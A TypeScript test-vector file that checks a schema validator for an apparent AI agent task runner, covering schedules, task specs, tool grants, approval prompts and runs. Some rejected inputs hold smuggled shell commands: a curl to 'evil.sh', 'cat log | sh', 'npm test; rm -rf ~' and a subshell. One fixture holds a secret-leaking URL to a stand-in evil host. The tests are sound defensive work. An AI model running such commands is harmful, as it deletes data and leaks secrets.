import { bad, badRule, edit, ok, type Vector } from "./types";
import * as F from "./fixtures";

export const common: Vector[] = [
  ok("DeviceId", "lowercase uuid", F.DEVICE),
  bad("DeviceId", "uppercase uuid", F.DEVICE.toUpperCase()),
  bad("DeviceId", "not a uuid", "desktop-1"),
  ok("TimestampMs", "epoch ms", F.T0),
  bad("TimestampMs", "fractional", 1.5),
  bad("TimestampMs", "negative", -1),
  bad("TimestampMs", "iso string", "2026-01-01T00:00:00Z"),
  ok("Seq", "first event", 1),
  bad("Seq", "zero", 0),
  ok("Origin", "desktop", F.origin()),
  bad("Origin", "unknown surface", { device_id: F.DEVICE, surface: "watch" }),
  ok("Content", "inline json", F.inline({ path: "src/index.ts" })),
  ok("Content", "blob reference", { kind: "blob", sha256: F.SHA, size: 1_048_576, preview: "diff --git a/…", expired: false }),
  badRule("Content", "inline over 4 KiB", F.inline("x".repeat(5000))),
  bad("Content", "untagged value", { path: "src/index.ts" }),
  bad("Content", "blob with bad hash", { kind: "blob", sha256: "abc", size: 1, preview: "", expired: false }),
  ok("JsonValue", "nested", { a: [1, "two", null, true, { b: 3.5 }] }),
];

export const schedule: Vector[] = [
  ok("CronExpression", "weekdays at nine", "0 9 * * 1-5"),
  ok("CronExpression", "every 15 minutes", "*/15 * * * *"),
  ok("CronExpression", "names and lists", "30 8 1,15 jan-jun mon"),
  ok("CronExpression", "sunday as 7", "0 0 * * 7"),
  ok("CronExpression", "macro", "@daily"),
  ok("CronExpression", "feb 29 exists", "0 0 29 2 *"),
  bad("CronExpression", "four fields", "0 9 * *"),
  bad("CronExpression", "six fields", "0 0 9 * * 1"),
  badRule("CronExpression", "minute out of range", "60 * * * *"),
  badRule("CronExpression", "day of month zero", "0 0 0 * *"),
  badRule("CronExpression", "feb 30 never fires", "0 0 30 2 *"),
  badRule("CronExpression", "quartz L", "0 0 L * *"),
  badRule("CronExpression", "quartz ?", "0 0 ? * 1"),
  badRule("CronExpression", "zero step", "*/0 * * * *"),
  badRule("CronExpression", "reversed range", "0 0 * * 5-1"),
  bad("CronExpression", "@reboot", "@reboot"),
  bad("CronExpression", "double space", "0  9 * * *"),
  ok("IanaTimezone", "Europe/London", "Europe/London"),
  ok("IanaTimezone", "UTC", "UTC"),
  ok("IanaTimezone", "America/Argentina/Buenos_Aires", "America/Argentina/Buenos_Aires"),
  ok("IanaTimezone", "legacy alias", "US/Pacific"),
  bad("IanaTimezone", "utc offset", "+05:00"),
  bad("IanaTimezone", "empty", ""),
  badRule("IanaTimezone", "unknown zone", "Mars/Olympus_Mons"),
  ok("ScheduleSpec", "cron", { kind: "cron", cron: "0 9 * * *", timezone: "America/New_York", catchup: "run_once", max_catchup: 1 }),
  ok("ScheduleSpec", "interval", { kind: "interval", every_minutes: 15, catchup: "skip", max_catchup: 1 }),
  bad("ScheduleSpec", "cron without timezone", { kind: "cron", cron: "0 9 * * *", catchup: "run_once", max_catchup: 1 }),
  bad("ScheduleSpec", "interval zero", { kind: "interval", every_minutes: 0, catchup: "skip", max_catchup: 1 }),
  bad("ScheduleSpec", "unknown catchup", { kind: "interval", every_minutes: 5, catchup: "later", max_catchup: 1 }),
  ok("ScheduleState", "enabled", F.scheduleState()),
  ok("ScheduleState", "paused after failures", F.scheduleState({ enabled: false, paused_reason: "failures", next_fire_at: null, consecutive_failures: 3 })),
  ok("ScheduleState", "interval", F.scheduleState({ schedule: { kind: "interval", every_minutes: 15, catchup: "skip", max_catchup: 1 } })),
  bad("ScheduleState", "unknown paused_reason", F.scheduleState({ enabled: false, paused_reason: "tired" })),
  badRule("ScheduleState", "disabled without a reason", F.scheduleState({ enabled: false, paused_reason: null })),
  badRule("ScheduleState", "enabled with a reason", F.scheduleState({ paused_reason: "user" })),
  ok("ScheduleCoverage", "ran 10 of 12", {
    schedule_id: F.SCHEDULE,
    day: "2026-01-01",
    expected: 12,
    ran: 10,
    missed_asleep: 2,
    missed_not_running: 0,
    merged: 0,
  }),
  ok("ScheduleCoverage", "one merged", {
    schedule_id: F.SCHEDULE,
    day: "2026-01-01",
    expected: 12,
    ran: 11,
    missed_asleep: 0,
    missed_not_running: 0,
    merged: 1,
  }),
  bad("ScheduleCoverage", "missing merged", {
    schedule_id: F.SCHEDULE,
    day: "2026-01-01",
    expected: 12,
    ran: 10,
    missed_asleep: 2,
    missed_not_running: 0,
  }),
  badRule("ScheduleCoverage", "more than expected", {
    schedule_id: F.SCHEDULE,
    day: "2026-01-01",
    expected: 2,
    ran: 1,
    missed_asleep: 1,
    missed_not_running: 0,
    merged: 1,
  }),
];

export const health: Vector[] = [
  ok("HealthSettings", "daily at 08:00", { enabled: true, time: "08:00", timezone: "America/Los_Angeles" }),
  ok("HealthSettings", "off", { enabled: false, time: "08:00", timezone: "UTC" }),
  bad("HealthSettings", "24:00", { enabled: true, time: "24:00", timezone: "UTC" }),
  bad("HealthSettings", "single-digit hour", { enabled: true, time: "8:00", timezone: "UTC" }),
  ok("Downtime", "asleep overnight", { start_at: F.T0, end_at: F.T0 + 25_200_000, cause: "asleep" }),
  badRule("Downtime", "ends before it starts", { start_at: F.T0 + 1, end_at: F.T0, cause: "not_running" }),
  ok("MonitorHealth", "mostly asleep", F.monitorHealth()),
  ok("MonitorHealth", "paused", F.monitorHealth({ enabled: false, paused_reason: "failures", next_fire_at: null })),
  bad("MonitorHealth", "negative cost", F.monitorHealth({ cost_usd: -1 })),
  ok("HealthDigest", "one day", F.healthDigest()),
  ok("HealthDigest", "no monitors", F.healthDigest({ monitors: [], downtime: [], cost_usd: 0, needs_attention: false })),
  badRule("HealthDigest", "empty period", F.healthDigest({ to: F.T0 })),
];

const withBash = (patterns: unknown[]) =>
  F.sessionSpec({ tools: F.tools({ builtin: ["Read", "Bash"] }), policy: F.policy({ bash_patterns: patterns }) });

export const taskSpec: Vector[] = [
  ok("TaskSpec", "session", F.sessionSpec()),
  ok("TaskSpec", "session with bash patterns", withBash([{ pattern: "npm test", class: "read" }, { pattern: "git push", class: "network" }])),
  ok("TaskSpec", "session with MCP servers", F.sessionSpec({
    tools: F.tools({
      mcp_servers: [
        { id: "github", transport: "stdio", runner: "npx", package: "@modelcontextprotocol/server-github", version: "2025.4.8", args: [], env: {} },
        { id: "linear", transport: "http", url: "https://mcp.linear.app/sse" },
      ],
      homerun: ["notify"],
    }),
  })),
  ok("TaskSpec", "monitor with rule check", F.monitorSpec()),
  ok("TaskSpec", "monitor with model check and interval", F.monitorSpec({
    schedule: { kind: "interval", every_minutes: 30, catchup: "run_all", max_catchup: 5 },
    check: { kind: "model", model: "claude-haiku-4-5", instructions: "Has the status page reported an incident?" },
  })),
  ok("TaskSpec", "monitor with model check on a fetched source", F.monitorSpec({
    check: {
      kind: "model",
      model: "claude-haiku-4-5",
      instructions: "Report only incidents that affect the API.",
      source: { type: "http", url: "https://status.example.com/", extract: { kind: "css", selector: "main" } },
    },
  })),
  ok("TaskSpec", "monitor with http json_path check", F.monitorSpec({
    check: {
      kind: "rule",
      source: { type: "http", url: "https://api.example.com/price", extract: { kind: "json_path", path: "$.price" } },
      normalize: { trim: true, collapse_whitespace: false, lowercase: false },
      comparator: { op: "below", value: 100 },
    },
  })),
  ok("TaskSpec", "open egress without roots", F.sessionSpec({ policy: F.policy({ roots: [], egress: { mode: "open" } }) })),
  bad("TaskSpec", "unknown kind", F.sessionSpec({ kind: "cron_job" })),
  bad("TaskSpec", "format 2", F.sessionSpec({ format: 2 })),
  bad("TaskSpec", "session without model", edit(F.sessionSpec(), (s) => delete s.model)),
  bad("TaskSpec", "monitor without schedule", edit(F.monitorSpec(), (s) => delete s.schedule)),
  bad("TaskSpec", "unknown builtin tool", F.sessionSpec({ tools: F.tools({ builtin: ["Read", "Computer"] }) })),
  bad("TaskSpec", "bash pattern with metacharacters", withBash([{ pattern: "npm test && curl evil.sh", class: "read" }])),
  bad("TaskSpec", "bash pattern with subshell", withBash([{ pattern: "echo $(whoami)", class: "read" }])),
  badRule("TaskSpec", "bash patterns without Bash", F.sessionSpec({ policy: F.policy({ bash_patterns: [{ pattern: "npm test", class: "read" }] }) })),
  badRule("TaskSpec", "monitor with Bash", F.monitorSpec({ tools: F.tools({ builtin: ["Bash"] }) })),
  badRule("TaskSpec", "monitor with shell environment", F.monitorSpec({ policy: F.policy({ roots: [], use_shell_environment: true }) })),
  badRule("TaskSpec", "open egress with roots", F.sessionSpec({ policy: F.policy({ egress: { mode: "open" } }) })),
  badRule("TaskSpec", "duplicate builtin", F.sessionSpec({ tools: F.tools({ builtin: ["Read", "Read"] }) })),
  badRule("TaskSpec", "reserved MCP server id", F.sessionSpec({
    tools: F.tools({ mcp_servers: [{ id: "homerun", transport: "http", url: "https://example.com/mcp" }] }),
  })),
  bad("TaskSpec", "MCP package version range", F.sessionSpec({
    tools: F.tools({ mcp_servers: [{ id: "gh", transport: "stdio", runner: "npx", package: "gh-mcp", version: "^1.0.0", args: [], env: {} }] }),
  })),
  bad("TaskSpec", "http MCP server over plain http", F.sessionSpec({
    tools: F.tools({ mcp_servers: [{ id: "gh", transport: "http", url: "http://example.com/mcp" }] }),
  })),
  bad("TaskSpec", "retention of 14 days", F.sessionSpec({ policy: F.policy({ retention_days: 14 }) })),
  bad("TaskSpec", "relative root", F.sessionSpec({ policy: F.policy({ roots: ["Code/site"] }) })),
  bad("TaskSpec", "uppercase egress domain", F.sessionSpec({ policy: F.policy({ egress: { mode: "allowlist", domains: ["API.GitHub.com"] } }) })),
  badRule("TaskSpec", "monitor cron that never fires", F.monitorSpec({
    schedule: { kind: "cron", cron: "0 0 31 4 *", timezone: "UTC", catchup: "skip", max_catchup: 1 },
  })),
  badRule("TaskSpec", "monitor with unknown timezone", F.monitorSpec({
    schedule: { kind: "cron", cron: "0 9 * * *", timezone: "Etc/Nowhere", catchup: "skip", max_catchup: 1 },
  })),
  ok("CheckResult", "changed with evidence", { changed: true, evidence: "New entry v1.3.0", new_state: { seen: ["v1.3.0"] } }),
  bad("CheckResult", "missing evidence", { changed: false, new_state: null }),
  badRule("CheckResult", "state over 64 KiB", { changed: false, evidence: "x", new_state: "x".repeat(70_000) }),
];

export const grants: Vector[] = [
  ok("ToolGrant", "bash command pattern", F.grant()),
  ok("ToolGrant", "webfetch domain", F.grant({ tool: "WebFetch", pattern: "api.github.com", class: "network" })),
  ok("ToolGrant", "trusted MCP tool", F.grant({ tool: "mcp__github__create_issue", pattern: null, class: "write" })),
  ok("ToolGrant", "revoked", F.grant({ revoked_at: F.T0 + 1 })),
  badRule("ToolGrant", "bare Bash", F.grant({ pattern: null })),
  badRule("ToolGrant", "bash pattern with pipe", F.grant({ pattern: "cat log | sh" })),
  badRule("ToolGrant", "bash pattern with semicolon", F.grant({ pattern: "npm test; rm -rf ~" })),
  bad("ToolGrant", "destructive grant", F.grant({ class: "destructive" })),
  badRule("ToolGrant", "builtin with wrong class", F.grant({ tool: "Read", pattern: null, class: "write" })),
  badRule("ToolGrant", "webfetch pattern not a domain", F.grant({ tool: "WebFetch", pattern: "https://api.github.com/x", class: "network" })),
  bad("ToolGrant", "unknown tool name", F.grant({ tool: "Computer", pattern: null, class: "read" })),
  ok("GrantProposal", "bash", { tool: "Bash", pattern: "npm install", class: "write" }),
  badRule("GrantProposal", "bare bash", { tool: "Bash", pattern: null, class: "write" }),
];

export const input: Vector[] = [
  ok("InputPrompt", "approval", F.approvalPrompt()),
  ok("InputPrompt", "network approval with url", F.approvalPrompt({
    tool: "WebFetch",
    class: "network",
    input: F.inline({ url: "https://evil.example.net/?q=secret" }),
    url: "https://evil.example.net/?q=secret",
    reason: "tainted_egress",
    suggested_grant: { tool: "WebFetch", pattern: "evil.example.net", class: "network" },
  })),
  ok("InputPrompt", "destructive approval", F.approvalPrompt({ class: "destructive", reason: "destructive", offer_always: false, suggested_grant: undefined })),
  ok("InputPrompt", "question", F.questionPrompt()),
  ok("InputPrompt", "ambiguous tool call", {
    type: "ambiguous_tool_call",
    tool: "mcp__github__create_issue",
    tool_call_id: F.TOOL_CALL,
    class: "write",
    input: F.inline({ title: "Bump astro" }),
  }),
  bad("InputPrompt", "unknown type", { type: "confirm", text: "OK?" }),
  bad("InputPrompt", "question with one option", F.questionPrompt({
    questions: [{ question: "Proceed?", options: [{ label: "yes" }], multi_select: false, allow_freeform: false }],
  })),
  bad("InputPrompt", "five questions", F.questionPrompt({ questions: Array(5).fill(F.questionPrompt().questions[0]) })),
  ok("InputResponse", "allow", { type: "approval", decision: "allow" }),
  ok("InputResponse", "allow always with grant", { type: "approval", decision: "allow_always", grant: { tool: "Bash", pattern: "npm install", class: "write" } }),
  ok("InputResponse", "question answer", { type: "question", answers: [{ selected: ["main"] }] }),
  ok("InputResponse", "freeform answer", { type: "question", answers: [{ selected: [], text: "release/2.0" }] }),
  ok("InputResponse", "did not run", { type: "ambiguous_tool_call", outcome: "not_run" }),
  badRule("InputResponse", "allow always without grant", { type: "approval", decision: "allow_always" }),
  badRule("InputResponse", "allow with grant", { type: "approval", decision: "allow", grant: { tool: "Bash", pattern: "npm install", class: "write" } }),
  badRule("InputResponse", "empty answer", { type: "question", answers: [{ selected: [] }] }),
  bad("InputResponse", "unknown decision", { type: "approval", decision: "maybe" }),
  ok("InputRequest", "pending approval", F.inputRequest()),
  ok("InputRequest", "answered question", F.inputRequest({
    kind: "question",
    prompt: F.questionPrompt(),
    state: "answered",
    answered_at: F.T0 + 5000,
    response: { type: "question", answers: [{ selected: ["main"] }] },
    answered_by: F.PHONE,
  })),
  ok("InputRequest", "ambiguous call stored as question", F.inputRequest({
    kind: "question",
    prompt: { type: "ambiguous_tool_call", tool: "Write", tool_call_id: F.TOOL_CALL, class: "write", input: F.inline({ file_path: "/tmp/a" }) },
  })),
  badRule("InputRequest", "kind does not match prompt", F.inputRequest({ kind: "question" })),
  badRule("InputRequest", "answered without response", F.inputRequest({ state: "answered", answered_at: F.T0, answered_by: F.PHONE })),
  badRule("InputRequest", "response type mismatch", F.inputRequest({
    state: "answered",
    answered_at: F.T0,
    answered_by: F.PHONE,
    response: { type: "question", answers: [{ selected: ["main"] }] },
  })),
];

const monitorRun = (over: Record<string, unknown>) =>
  F.run({ trigger: "schedule", origin_device: null, scheduled_for: F.T0, dedupe_key: `${F.TASK}:${F.T0}:0`, ...over });

export const domain: Vector[] = [
  ok("Device", "mac", { device_id: F.DEVICE, platform: "macos", hostname: "studio.local", account_id: null, created_at: F.T0 }),
  bad("Device", "unknown platform", { device_id: F.DEVICE, platform: "ios", hostname: "x", account_id: null, created_at: F.T0 }),
  ok("Task", "session", F.task()),
  ok("Task", "monitor", F.task({ kind: "monitor", name: "Release watcher", spec: F.monitorSpec() })),
  badRule("Task", "kind mismatch", F.task({ kind: "monitor" })),
  badRule("Task", "name mismatch", F.task({ name: "Other" })),
  bad("Task", "version zero", F.task({ version: 0 })),
  ok("TaskVersion", "v3", { task_id: F.TASK, version: 3, spec: F.sessionSpec(), created_at: F.T0 }),
  ok("Thread", "chat", F.thread({ task_id: null, title: null, last_seq: 0 })),
  ok("Run", "running message run", F.run()),
  ok("Run", "waiting for input", F.run({ state: "waiting_input" })),
  ok("Run", "pending chat run", F.run({ task_id: null, task_version: null, state: "pending", started_at: null, claude_pid: null, sdk_session_id: null })),
  ok("Run", "web read-only", F.run({ authority: "web_read_only" })),
  ok("Run", "monitor changed", monitorRun({
    state: "succeeded",
    ended_at: F.T0 + 60_000,
    outcome: "changed",
    claude_pid: null,
    check_result: { changed: true, evidence: "New release v1.3.0", new_state: { seen: ["v1.3.0"] } },
    cost_usd: 0.0123,
  })),
  ok("Run", "monitor retry failed", monitorRun({
    attempt: 2,
    state: "failed",
    ended_at: F.T0 + 60_000,
    claude_pid: null,
    error: { code: "model_unavailable", message: "overloaded" },
    dedupe_key: `${F.TASK}:${F.T0}:2`,
  })),
  ok("Run", "catch-up abandoned", monitorRun({ trigger: "catchup", state: "abandoned", ended_at: F.T0, started_at: null, claude_pid: null, sdk_session_id: null })),
  bad("Run", "unknown state", F.run({ state: "paused" })),
  bad("Run", "attempt 3", monitorRun({ attempt: 3 })),
  badRule("Run", "scheduled run with origin", monitorRun({ origin_device: F.PHONE })),
  badRule("Run", "message run without origin", F.run({ origin_device: null })),
  badRule("Run", "outcome on failed run", F.run({ state: "failed", ended_at: F.T0, claude_pid: null, outcome: "changed" })),
  badRule("Run", "terminal without ended_at", F.run({ state: "succeeded", claude_pid: null })),
  badRule("Run", "task_version without task", F.run({ task_id: null })),
  badRule("Run", "retry of a message run", F.run({ attempt: 1 })),
  ok("MonitorState", "seen list", F.monitorState()),
  badRule("MonitorState", "over 64 KiB", F.monitorState({ state: { blob: "x".repeat(66_000) } })),
  ok("ThreadSummary", "with active run", F.summary()),
  ok("ThreadSummary", "empty chat", F.summary({ task_id: null, title: null, last_seq: 0, last_message: null, unread_count: 0, active_run: null })),
  bad("ThreadSummary", "terminal active run", F.summary({ active_run: { run_id: F.RUN, state: "succeeded" } })),
];
